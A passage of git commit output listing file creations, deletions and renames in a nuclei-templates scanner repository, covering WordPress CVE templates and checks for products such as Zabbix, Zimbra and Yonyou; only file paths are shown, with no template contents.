nuclei-templates/Other/wooyun-path-traversal-11229.yaml create mode 100644 nuclei-templates/Other/wooyun-path-traversal-11233.yaml delete mode 100644 nuclei-templates/Other/wordpress-LFI.yaml rename nuclei-templates/{wordpress/wordpress-accessible-wpconfig-11239.yaml => Other/wordpress-accessible-wpconfig.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-bbpress-plugin-listing.yaml create mode 100644 nuclei-templates/Other/wordpress-detect.yaml create mode 100644 nuclei-templates/Other/wordpress-directory-listing-11266.yaml rename nuclei-templates/{wordpress/wordpress-elementor-plugin-listing-11267.yaml => Other/wordpress-elementor-plugin-listing.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-emails-verification-for-woocommerce.yaml delete mode 100644 nuclei-templates/Other/wordpress-git-config.yaml create mode 100644 nuclei-templates/Other/wordpress-lfi(1).yaml rename nuclei-templates/{wordpress => Other}/wordpress-rdf-user-enum.yaml (100%) create mode 100644 nuclei-templates/Other/wordpress-redirection-plugin-listing.yaml rename nuclei-templates/{wordpress => Other}/wordpress-ssrf-oembed.yaml (93%) delete mode 100644 nuclei-templates/Other/wordpress-theme-detect.yaml create mode 100644 nuclei-templates/Other/wordpress-total-upkeep-backup-download.yaml rename nuclei-templates/{wordpress/wordpress-updraftplus-pem-key-11325.yaml => Other/wordpress-updraftplus-pem-key.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-user-enum.yaml rename nuclei-templates/{wordpress/wordpress-user-enumeration.yaml => Other/wordpress-user-enumeration-11329.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-listing.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss.yaml rename nuclei-templates/{wordpress => Other}/wordpress-workflow.yaml (100%) create mode 100644 nuclei-templates/Other/wordpress-wpcourses-info-disclosure.yaml rename nuclei-templates/{wordpress => Other}/wordpress-xmlrpc-listmethods.yaml (100%) create mode 100644 nuclei-templates/Other/wordpress.yaml rename nuclei-templates/Other/{workresources-rdp-11380.yaml => workresources-rdp-11382.yaml} (100%) delete mode 100644 nuclei-templates/Other/worksites-detection-11385.yaml create mode 100644 nuclei-templates/Other/worksites-detection.yaml rename nuclei-templates/Other/{worksites-takeover.yaml => worksites-takeover-11388.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-123contactform-plugin-listing.yaml rename nuclei-templates/Other/{wp-app-log.yaml => wp-app-log-11411.yaml} (100%) rename nuclei-templates/Other/{wpengine-config-check.yaml => wp-engine-config.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-finder-xss.yaml rename nuclei-templates/{wordpress/wp-full-path-disclosure-11457.yaml => Other/wp-full-path-disclosure.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-iwp-client-listing.yaml create mode 100644 nuclei-templates/Other/wp-license-file-11489.yaml rename nuclei-templates/{wordpress => Other}/wp-mailchimp-log-exposure.yaml (93%) delete mode 100644 nuclei-templates/Other/wp-multiple-theme-ssrf.yaml rename nuclei-templates/{wordpress/wp-slideshow-xss-11576.yaml => Other/wp-slideshow-xss.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-tutor-lfi.yaml rename nuclei-templates/{wordpress => Other}/wp-woocommerce-pdf-invoice-listing.yaml (96%) create mode 100644 nuclei-templates/Other/wp-xmlrpc-11631.yaml rename nuclei-templates/Other/{upkeep_wordpress.yaml => wpbackup.yaml} (100%) rename nuclei-templates/Other/{wso2-management-console-11645.yaml => wso2-management-console-11644.yaml} (100%) delete mode 100644 nuclei-templates/Other/wso2mgmtconsole(1).yaml create mode 100644 nuclei-templates/Other/wso2mgmtconsole.yaml delete mode 100644 nuclei-templates/Other/wufoo-takeover-11648.yaml create mode 100644 nuclei-templates/Other/wufoo-takeover-11651.yaml create mode 100644 nuclei-templates/Other/wuzhicms-detect-11655.yaml delete mode 100644 nuclei-templates/Other/wuzhicms-detect.yaml rename nuclei-templates/Other/{wuzhicms-sqli-11656.yaml => wuzhicms-sqli-11658.yaml} (100%) create mode 100644 nuclei-templates/Other/x-forwarded-header.yaml rename nuclei-templates/Other/{host-header-injection_.yaml => x-forwarded-host-injection.yaml} (100%) delete mode 100644 nuclei-templates/Other/x-forwarded-host.yaml delete mode 100644 nuclei-templates/Other/xdcms-sqli-11664.yaml create mode 100644 nuclei-templates/Other/xdcms-sqli.yaml rename nuclei-templates/Other/{xenforo-login.yaml => xenforo-login-11673.yaml} (100%) rename nuclei-templates/Other/{xenmobile-login-11677.yaml => xenmobile-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/xerox-efi-lfi-11683.yaml create mode 100644 nuclei-templates/Other/xerox-efi-lfi.yaml create mode 100644 nuclei-templates/Other/xerox7-default-login-11680.yaml delete mode 100644 nuclei-templates/Other/xerox7-default-login.yaml delete mode 100644 nuclei-templates/Other/xml-schema-detect-11691.yaml create mode 100644 nuclei-templates/Other/xml-schema-detect.yaml create mode 100644 nuclei-templates/Other/xmlrpc-pingback-ssrf-11688.yaml delete mode 100644 nuclei-templates/Other/xmlrpc-pingback-ssrf.yaml create mode 100644 nuclei-templates/Other/xp-webcam-11697.yaml delete mode 100644 nuclei-templates/Other/xp-webcam.yaml rename nuclei-templates/Other/{xprober-service.yaml => xprober-service-11695.yaml} (100%) delete mode 100644 nuclei-templates/Other/xss-fuzz-11700.yaml create mode 100644 nuclei-templates/Other/xss-fuzz-11701.yaml rename nuclei-templates/Other/{fuzzing-xss-get-params-html-injection.yaml => xss-fuzz-html-tag-injection.yaml} (100%) rename nuclei-templates/Other/{headless-reflected-pitchfork.yaml => xss-headless.yaml} (100%) delete mode 100644 nuclei-templates/Other/xvr-login-11704.yaml create mode 100644 nuclei-templates/Other/xvr-login-11706.yaml delete mode 100644 nuclei-templates/Other/xxljob-default-login-11713.yaml create mode 100644 nuclei-templates/Other/xxljob-default-login.yaml rename nuclei-templates/Other/{xxljob-panel-11715.yaml => xxljob-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/yapi-detect-11719.yaml create mode 100644 nuclei-templates/Other/yapi-detect-11721.yaml rename nuclei-templates/Other/{yapi-rce.yaml => yapi-rce-11725.yaml} (100%) rename nuclei-templates/Other/{yarn-lock-11729.yaml => yarn-lock.yaml} (100%) rename nuclei-templates/Other/{yii-debugger-11739.yaml => yii-debugger-11738.yaml} (100%) delete mode 100644 nuclei-templates/Other/yishaadmin-lfi-11742.yaml create mode 100644 nuclei-templates/Other/yishaadmin-lfi-11744.yaml create mode 100644 nuclei-templates/Other/yongyou-icurrtype-sqli.yaml delete mode 100644 nuclei-templates/Other/yongyou-jdbcread.yaml delete mode 100644 nuclei-templates/Other/yongyou-ssrf-11745.yaml create mode 100644 nuclei-templates/Other/yongyou-ssrf.yaml create mode 100644 nuclei-templates/Other/yongyou-u8-RegisterServlet-sql-Injection.yaml rename nuclei-templates/Other/{yonyou-nc-cloud-rce.yaml => yonyou-nc-cloud-jsinvoke-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/yonyou-u8-registerservlet-sqli.yaml rename nuclei-templates/Other/{yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml => yonyou_nc_cloud_ncchr_attachment_uploadchunk_upload.yaml} (100%) rename nuclei-templates/Other/{yunxintong-fileread.yaml => yunxintong-fileRead.yaml} (100%) rename nuclei-templates/Other/{yzmcms-detect.yaml => yzmcms-detect-11751.yaml} (100%) create mode 100644 nuclei-templates/Other/zabbix-dashboards-access-11756.yaml delete mode 100644 nuclei-templates/Other/zabbix-dashboards-access.yaml delete mode 100644 nuclei-templates/Other/zabbix-default-login-11760.yaml create mode 100644 nuclei-templates/Other/zabbix-default-login-11763.yaml create mode 100644 nuclei-templates/Other/zabbix-server-login-11767.yaml delete mode 100644 nuclei-templates/Other/zabbix-server-login.yaml delete mode 100644 nuclei-templates/Other/zabbix.yaml create mode 100644 nuclei-templates/Other/zcms-v3-sqli-11773.yaml delete mode 100644 nuclei-templates/Other/zcms-v3-sqli.yaml rename nuclei-templates/Other/{zend-config-file-11779.yaml => zend-config-file.yaml} (100%) rename nuclei-templates/Other/{zendesk-takeover-11781.yaml => zendesk-takeover-11783.yaml} (100%) create mode 100644 nuclei-templates/Other/zhixiangOA-msg.aspx-sql.yaml delete mode 100644 nuclei-templates/Other/zhixiangOA-msglog.aspx-sql.yaml create mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11791.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-file-upload.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-oa-info-leak-11797.yaml create mode 100644 nuclei-templates/Other/zhiyuan-oa-info-leak-11799.yaml create mode 100644 nuclei-templates/Other/zhiyuan-oa-session-leak-11802.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-oa-session-leak-11804.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-oa-unauthorized-11806.yaml create mode 100644 nuclei-templates/Other/zhiyuan-oa-unauthorized-11808.yaml delete mode 100644 nuclei-templates/Other/zimbra-preauth-ssrf-11811.yaml create mode 100644 nuclei-templates/Other/zimbra-preauth-ssrf.yaml rename nuclei-templates/Other/{zimbra-web-client.yaml => zimbra-web-client-11812.yaml} (100%) create mode 100644 nuclei-templates/Other/zip-backup-files-11815.yaml delete mode 100644 nuclei-templates/Other/zip-backup-files-11817.yaml create mode 100644 nuclei-templates/Other/zmanda-default-login-11825.yaml delete mode 100644 nuclei-templates/Other/zmanda-default-login.yaml delete mode 100644 nuclei-templates/Other/zms-auth-bypass-11829.yaml create mode 100644 nuclei-templates/Other/zms-auth-bypass-11832.yaml delete mode 100644 nuclei-templates/Other/zoneminder-time-based-sql-injection.yaml delete mode 100644 nuclei-templates/Other/zte-panel-11838.yaml create mode 100644 nuclei-templates/Other/zte-panel-11840.yaml delete mode 100644 nuclei-templates/wordpress/2475241188.yaml rename nuclei-templates/wordpress/{cve-2011-1669.yaml => CVE-2011-1669-2041.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2011-4624-2078.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2011-5179-2105.yaml create mode 100644 nuclei-templates/wordpress/CVE-2011-5181-2112.yaml create mode 100644 nuclei-templates/wordpress/CVE-2012-0896-2135.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2012-0896.yaml create mode 100644 nuclei-templates/wordpress/CVE-2012-0901-2141.yaml create mode 100644 nuclei-templates/wordpress/CVE-2012-1835-2171.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2012-2371-2174.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2012-4273-2194.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2012-4768-2206.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2012-5913-2222.yaml create mode 100644 nuclei-templates/wordpress/CVE-2013-2287-2244.yaml rename nuclei-templates/wordpress/{cve-2013-3526-2251.yaml => CVE-2013-3526-2251.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2013-4117-2263.yaml rename nuclei-templates/wordpress/{CVE-2013-6281-2281.yaml => CVE-2013-6281.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2013-7240-2287.yaml create mode 100644 nuclei-templates/wordpress/CVE-2014-2383.yaml create mode 100644 nuclei-templates/wordpress/CVE-2014-4535-2346.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2014-4536-2353.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2014-4544-2360.yaml create mode 100644 nuclei-templates/wordpress/CVE-2014-4544-2362.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2014-4592-2380.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2014-4942.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2014-5368-2394.yaml create mode 100644 nuclei-templates/wordpress/CVE-2014-5368.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2014-9094-2422.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2015-1000012-2457.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2015-4414.yaml rename nuclei-templates/wordpress/{CVE-2015-4694-2542.yaml => CVE-2015-4694-2545.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2015-5461-2552.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2015-6920-2585.yaml create mode 100644 nuclei-templates/wordpress/CVE-2015-9304.yaml create mode 100644 nuclei-templates/wordpress/CVE-2015-9471.yaml create mode 100644 nuclei-templates/wordpress/CVE-2015-9498.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-1000128-2648.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000130-2659.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-1000132-2668.yaml rename nuclei-templates/wordpress/{cve-2016-1000134-2679.yaml => CVE-2016-1000134-2680.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000135-2685.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-1000137-2690.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000137-2692.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-1000140-2706.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000141-2707.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000143-2717.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000146-2721.yaml rename nuclei-templates/wordpress/{cve-2016-1000148.yaml => CVE-2016-1000148-2724.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000149-2728.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000154-2737.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-1000154-2739.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-1000155-2744.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-10033-2747.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-10872.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-10884.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-10924-2754.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-10924.yaml rename nuclei-templates/wordpress/{cve-2016-10940-2757.yaml => CVE-2016-10940.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2016-10956-2762.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-10960-2763.yaml create mode 100644 nuclei-templates/wordpress/CVE-2016-10960-2767.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2016-11085.yaml create mode 100644 nuclei-templates/wordpress/CVE-2017-18536-2995.yaml create mode 100644 nuclei-templates/wordpress/CVE-2017-18598-2997.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2017-18634.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2017-5487-3024.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2017-9288-3084.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-11709-3196.yaml create mode 100644 nuclei-templates/wordpress/CVE-2018-16299-3371.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-16299-3374.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-17207.yaml rename nuclei-templates/wordpress/{CVE-2018-20985.yaml => CVE-2018-20985-3505.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2018-3810-3554.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-3810-3555.yaml create mode 100644 nuclei-templates/wordpress/CVE-2018-7422-3592.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-7422.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-7543.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2018-8719-3642.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-10692(1).yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-11869-3763.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-11869-3764.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-11869.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-13573.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-14205-3829.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-14313.yaml rename nuclei-templates/wordpress/{cve-2019-14470-3854.yaml => CVE-2019-14470-3854.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2019-15112.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-15116.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-15858-3888.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-16118.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-16219.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-16525-3937.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-16931.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-17232.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-17233.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-17673.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-20141.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-20209.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-20360.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-25141.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-6112-4177.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2019-9567.yaml rename nuclei-templates/wordpress/{cve-2019-9618-4295.yaml => CVE-2019-9618-4295.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2019-9912.yaml create mode 100644 nuclei-templates/wordpress/CVE-2019-9978-4331.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-11515.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-11738-4430.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-11930-4444.yaml rename nuclei-templates/wordpress/{cve-2020-12800-4486.yaml => CVE-2020-12800-4488.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2020-14092.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-15299.yaml rename nuclei-templates/wordpress/{cve-2020-24148.yaml => CVE-2020-24148-4790.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2020-24186-4797.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-24312-4805.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-25213-4859.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-26876-4926.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-26876.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-28036.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-28037.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-28038.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-28039.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-28978.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-29395-5005.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-35234-5025.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-35234.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-35749.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-36155.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-36157.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-36710.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-36739.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-36760.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-6859.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-7048.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-8436.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2020-8658.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-8771-5338.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-8772.yaml create mode 100644 nuclei-templates/wordpress/CVE-2020-9454.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-20792-5478.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-20792.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-21389-5511.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24139.yaml rename nuclei-templates/wordpress/{cve-2021-24146.yaml => CVE-2021-24146-5629.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2021-24148.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24166.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24210.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24213.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24226-5647.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24228.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24229.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24230.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24231.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24235-5651.yaml rename nuclei-templates/wordpress/{CVE-2021-24236.yaml => CVE-2021-24236(1).yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2021-24274-5658.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24274-5660.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24278-5668.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24284(1).yaml rename nuclei-templates/wordpress/{CVE-2021-24285-5673.yaml => CVE-2021-24285-5672.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2021-24288-5679.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24291-5681.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24297.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24298-5684.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24298-5686.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24316-5691.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24316-5695.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24340-5711.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24340-5712.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24358-5717.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24364-5721.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24387-5725.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24472-5743.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24472.yaml rename nuclei-templates/wordpress/{cve-2021-24488.yaml => CVE-2021-24488.yaml} (100%) rename nuclei-templates/wordpress/{cve-2021-24498-5753.yaml => CVE-2021-24498-5754.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2021-24508.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24522.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24527.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24565.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24657.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24750.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24761.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24762.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24764.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24806.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24838-5770.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24873.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24891.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24925.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-24926-5772.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24947-5775.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24948.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24949.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-24991-5779.yaml rename nuclei-templates/wordpress/{cve-2021-24997.yaml => CVE-2021-24997-5782.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2021-25017.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25022.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25028-5786.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25040.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25041.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-25063-5794.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-25070.yaml rename nuclei-templates/wordpress/{cve-2021-25074-5800.yaml => CVE-2021-25074-5800.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2021-25075.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-25087.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25089.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-25098.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25112-5804.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-25112.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-25120.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-34620.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-34623.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-34640-6237.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-34643.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-38314-6299.yaml rename nuclei-templates/wordpress/{CVE-2021-39312-6327.yaml => CVE-2021-39312(1).yaml} (100%) delete mode 100644 nuclei-templates/wordpress/CVE-2021-39316.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-39327.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-39350-6345.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-4392.yaml create mode 100644 nuclei-templates/wordpress/CVE-2021-4417.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2021-46889.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0141.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0142.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0148-6605.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0149-6606.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0149-6607.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0165.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0208(1).yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0250.yaml rename nuclei-templates/wordpress/{CVE-2022-0271-6616.yaml => CVE-2022-0271-6617.yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2022-0288(1).yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0320.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0328.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0346.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0422.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0513.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0591-6637.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0594(1).yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0595(1).yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0599.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0640.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0653-6640.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-0653.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0681.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0694.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-0770.yaml rename nuclei-templates/wordpress/{CVE-2022-1020.yaml => CVE-2022-1020(1).yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2022-1054.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-1166.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1209.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-1221(1).yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1221.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1281.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1282.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1392-6651.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-1392.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-1598-6653.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1598.yaml rename nuclei-templates/wordpress/{cve-2022-1724.yaml => CVE-2022-1724(1).yaml} (100%) create mode 100644 nuclei-templates/wordpress/CVE-2022-1895.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-1904(1).yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1937(1).yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-1937.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-1985.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-2167.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-2187(1).yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-2187.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-2260.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-2362.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-2461.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-25306.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-25307.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-2532.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-2536.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-2552.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-27849-6740.yaml delete mode 100644 